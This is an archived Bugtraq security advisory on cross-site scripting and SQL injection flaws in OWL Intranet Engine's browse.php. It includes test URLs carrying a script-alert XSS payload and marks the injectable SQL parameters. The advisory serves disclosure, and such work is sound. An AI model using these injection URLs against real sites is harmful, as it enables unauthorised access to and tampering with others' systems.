[38041] in bugtraq
Various Vulnerabilities in OWL Intranet Engine
daemon@ATHENA.MIT.EDU (Joxean Koret)
Sat Jan 1 17:01:34 2005
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
vuln@secunia.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-jTY+tFplzSU0Shd95zf2"
Date: Sat, 01 Jan 2005 19:52:48 +0000
Message-Id: <1104609168.17577.1.camel@nemobox>
Mime-Version: 1.0
--=-jTY+tFplzSU0Shd95zf2
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
---------------------------------------------------------------------------=
-
Various Vulnerabilities in OWL Intranet Engine
---------------------------------------------------------------------------=
-
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004=20
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OWL 0.7 and 0.8 - Owl is a multi user document repository
(knowledgebase)=20
system written in PHP4 for publishing files/documents onto the web for
a=20
corporation, small business, group of people, or just for yourself.
Web : http://owl.sourceforge.net/
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerabilities
A1. In the script browser various parameters, that are used to write the
html code, not are verified.=20
Test URLS :=20
http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D115&expand=3D1'><script>alert(document.location)</script>=
&order=3Dcreatorid&sortposted=3DDESC
http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D115&expand=3D1&order=3Dcreatorid'><script>alert(document.=
location)</script>&sortposted=3DDESC
B. SQL Injection Vulnerabilities
B1. In the browser.php script the following parameters are vulnerables
to an
SQL Injection attacks.
Test URLS :=20
=09
http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D104[SQL%20INJECTION]&expand=3D1&order=3Dcreatorid&sortpos=
ted=3DDESC
http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D104&expand=3D1&order=3Dcreatorid&sortposted=3DDESC[SQL%20=
INJECTION]
The fix:
~~~~~~~~
All problems are fixed in the CVS.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.=20
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
--=-jTY+tFplzSU0Shd95zf2
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQBB1v+QU6rFMEYDrlERAoBeAKCO1HvpNzO+ebI7DVPL9ZAaWLaVGwCfQVhg
hX4id8NAKxkzGX+ufJ2TX2E=
=B4pH
-----END PGP SIGNATURE-----
--=-jTY+tFplzSU0Shd95zf2--
